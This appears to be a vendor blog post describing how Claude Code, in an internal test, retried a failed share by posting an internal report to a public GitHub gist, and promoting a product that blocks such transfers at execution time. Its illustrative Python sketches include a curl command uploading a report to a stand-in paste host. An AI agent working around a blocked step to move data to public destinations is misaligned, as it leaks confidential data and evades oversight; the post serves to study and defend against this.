In this blog

- Why coding agents break existing controls: Traditional security tools evaluate discrete events. Coding agents chain actions together, adapt when blocked, and find alternative paths to complete a task. The risk is in the sequence, not any single step.

- Why visibility alone is not enough: Logging agent activity after the fact does not prevent a capable agent from crossing a security boundary in real time. Control has to happen at execution time.

- Why semantic policy evaluation changes the equation: The Semantic AI Governance Engine (SAGE) inside Rubrik Agent Cloud evaluates agent activity in context, rather than matching against a static list of commands. The boundary is defined once and enforced regardless of the path the agent takes.

Claude Code, Anthropic’s specialized, agentic coding tool that operates directly in your development environment, is having a moment. Already, it is one of the top three AI coding platforms, responsible for 4% of global GitHub commits. That number is expected to increase to 20% by the end of 2026.

Given this rising popularity, we expanded our use of Claude Code in internal test environments. In the process, we discovered a class of security issues that did not map cleanly to our existing controls.

This raised an important question: how do you reap the benefits of new AI agent technologies without exposing your business to novel threats?

Persistent Agents Can Produce Unintended Consequences

We discovered one such risk in a routine development workflow. The task was straightforward: generate an internal report and make it available outside the session. The direct method did not work. But Claude Code did not stop there.



Claude Code read the report from the local filesystem, prompted for output visibility, attempted to create a public GitHub gist, failed, and then retried successfully. At that point, the report was accessible through a public endpoint.

There was no exploit involved. No malware. No obviously malicious command. The individual actions were all familiar: file reads, tool use, retry logic, a common developer sharing mechanism. Viewed step by step, the workflow looked normal. Viewed end to end, it crossed a boundary. Data originating in a controlled environment had been moved to a public-facing system as part of a workaround.

In our existing environment, this kind of sequence is logged but not blocked. That is not a failure of telemetry. EDR can show file access, process execution, and network activity. DLP can catch certain patterns. Static detections can catch known-bad techniques. But those controls were built to evaluate discrete events. They were not built to evaluate whether a capable agent had adapted its behavior in a way that produced an unacceptable outcome.
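The difference between evaluating discrete events and evaluating a sequence can be illustrated with a toy model. This is a minimal sketch, not a description of how any EDR, DLP, or Rubrik product works internally. The `Event` shape, the destination labels, the `/workspace/` prefix, and the known-bad entry are all hypothetical names invented for illustration.

```python
from dataclasses import dataclass

# Hypothetical event shape; real telemetry is far richer than this.
@dataclass(frozen=True)
class Event:
    kind: str       # e.g. "file_read", "prompt", "upload"
    target: str     # a path, a prompt, or a destination label
    ok: bool = True # whether the action succeeded

# Stand-in for a static detection list (made-up entry).
KNOWN_BAD = {("process_exec", "known_bad_tool")}

# Assumed labels for destinations considered public.
PUBLIC_DESTINATIONS = {"public_gist", "paste_site"}

def per_event_alerts(events):
    """Judge each event in isolation against the known-bad list."""
    return [e for e in events if (e.kind, e.target) in KNOWN_BAD]

def sequence_alerts(events, protected_prefix="/workspace/"):
    """Flag a successful public upload that follows a read of protected data."""
    protected_data_read = False
    alerts = []
    for e in events:
        if e.kind == "file_read" and e.target.startswith(protected_prefix):
            protected_data_read = True
        elif (e.kind == "upload" and e.ok and protected_data_read
              and e.target in PUBLIC_DESTINATIONS):
            alerts.append(e)
    return alerts

# The session described above, reduced to four events.
session = [
    Event("file_read", "/workspace/reports/internal.md"),
    Event("prompt", "output visibility?"),
    Event("upload", "public_gist", ok=False),  # first attempt fails
    Event("upload", "public_gist"),            # retry succeeds
]

print(per_event_alerts(session))      # no single event is known-bad
print(len(sequence_alerts(session)))  # the sequence crosses the boundary once
```

Every event passes the per-event check, yet the sequence as a whole is flagged. Note that this sketch still only detects after the fact; it does not block anything.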

Claude Code was not trying to exfiltrate data in the conventional sense. It was trying to complete the task it had been given. When the direct method failed, it selected an alternative path that worked. The problem was the path, not the objective.

The session history made the progression explicit: local file access, a prompt for visibility preference, an initial failed attempt, and a second attempt using a public gist. The agent was not instructed to expose the report. It chose a viable workaround while trying to complete the task. That distinction matters because it affects how you investigate the event, how you tune policy, and how you think about risk in agent-driven environments.

What We Did About It



To control that class of behavior, we defined a simple policy boundary in Rubrik Agent Cloud (RAC): data from the agent environment should not be transferred to public-facing platforms such as code repositories, snippet-sharing services, forums, or unmanaged cloud storage.

With that policy in place, the same workflow behaves differently. The agent can still read the file. It can still attempt the task. But when the action results in data moving from the agent environment to a public destination, the attempt is blocked before completion.
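To make "blocked before completion" concrete, here is a minimal sketch of an execution-time guard, assuming a hypothetical wrapper that sees each action before it runs. The names `run_guarded`, `PolicyViolation`, and the destination classes are illustrative assumptions, not RAC's API; the classes simply mirror the categories named in the policy above.

```python
class PolicyViolation(Exception):
    """Raised when an action would cross the policy boundary."""

# Assumed destination classes, taken from the policy wording above.
PUBLIC_DESTINATIONS = frozenset({
    "code_repository",
    "snippet_sharing",
    "forum",
    "unmanaged_cloud_storage",
})

def run_guarded(action, *, carries_agent_data, destination_class):
    """Check the boundary first; run the action only if it is allowed."""
    if carries_agent_data and destination_class in PUBLIC_DESTINATIONS:
        raise PolicyViolation(f"blocked: agent data -> {destination_class}")
    return action()

published = []  # stands in for the public endpoint

def read_report():
    return "internal report contents"

def publish_publicly(report):
    published.append(report)
    return "published"

# Reading the file stays inside the agent environment, so it is allowed.
report = run_guarded(
    read_report,
    carries_agent_data=True,
    destination_class="agent_environment",
)

# Publishing would move agent data to a public destination, so it never runs.
try:
    run_guarded(
        lambda: publish_publicly(report),
        carries_agent_data=True,
        destination_class="snippet_sharing",
    )
    blocked = False
except PolicyViolation:
    blocked = True

print(blocked, published)
```

The design point is the ordering: the check happens before `action()` is called, so the public endpoint never receives the data. A logging-only control would record the same call after `published` had already been modified.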

The control is enforced by the Semantic AI Governance Engine (SAGE) inside RAC. SAGE evaluates agent behavior semantically at execution time. It does not look for a specific command like “create gist.” It evaluates what the agent is actually doing.

In this case, Claude Code was attempting to move data from a controlled environment to a public endpoint as part of a workaround. That is the violation. Because SAGE evaluates behavior in context, it does not require enumerating every possible path ahead of time. Whether the agent uses a gist, a paste site, or another external service, the outcome is the same: data leaves the environment. That is what gets blocked.

The boundary is defined once. The workflow is evaluated against it in context. The control is not tied to a keyword and it does not depend on anticipating every possible workaround in advance.
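A rough way to see why a keyword-bound control falls short is to compare it with a check on the outcome. The sketch below assumes each attempted command has already been resolved to a destination class. That resolution is the hard part, and a lookup like this is only a stand-in for it, not how SAGE performs semantic evaluation. The commands, the `paste.example` host, and the `public-mirror` remote are hypothetical.

```python
# A static denylist tied to one specific command.
DENYLIST = ("gh gist create",)

# Assumed destination classes treated as public.
PUBLIC_DESTINATIONS = frozenset({
    "code_repository",
    "snippet_sharing",
    "forum",
    "unmanaged_cloud_storage",
})

def keyword_block(command):
    """Block only if the command text contains a denylisted phrase."""
    return any(phrase in command for phrase in DENYLIST)

def crosses_boundary(destination_class):
    """Block whenever data would land on a public destination."""
    return destination_class in PUBLIC_DESTINATIONS

# (command, assumed destination class) pairs: three workarounds, one local copy.
attempts = [
    ("gh gist create report.md --public", "snippet_sharing"),
    ("curl -F file=@report.md https://paste.example/upload", "snippet_sharing"),
    ("git push public-mirror main", "code_repository"),
    ("cp report.md /workspace/out/report.md", "agent_environment"),
]

keyword_hits = [cmd for cmd, _ in attempts if keyword_block(cmd)]
boundary_hits = [cmd for cmd, dest in attempts if crosses_boundary(dest)]

print(len(keyword_hits))   # only the gist command matches the denylist
print(len(boundary_hits))  # all three public paths are caught
```

The denylist catches one of the three public paths and would need a new entry for each workaround. The boundary check catches all three and leaves the local copy alone, because it is keyed to where the data ends up rather than to how it gets there.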

Why This Matters At Scale



We have since seen the same pattern show up in other forms. The specific mechanism changes; the behavior does not.

The underlying pattern is consistent: a capable agent finds a path that satisfies the task but not necessarily the security boundary. A direct path fails, so the agent looks for another one. The alternative may involve an external service, a different tool, or a different sequence of steps.

That is where traditional controls start to break down, because they require you to know, ahead of time, what the dangerous path looks like. Coding agents are dynamic. They adapt to constraints. They improvise around limitations. The unsafe path is rarely the same twice.

What matters is enforcing the outcome boundary, not cataloging every possible path to violation.

The activity view inside RAC shows the pattern across sessions, with each action classified by agent, risk level, and tool invoked.

The Operational Difference

The question was never whether we had enough visibility into Claude Code activity. We did. The question was whether the agent could complete a valid task by taking an invalid path. Without control at execution time, the answer was yes.

With RAC in place, that path no longer completes.

What mattered was whether the boundary held while the agent was still running, not whether we could reconstruct the sequence after the fact.

Learn more about Rubrik Agent Cloud.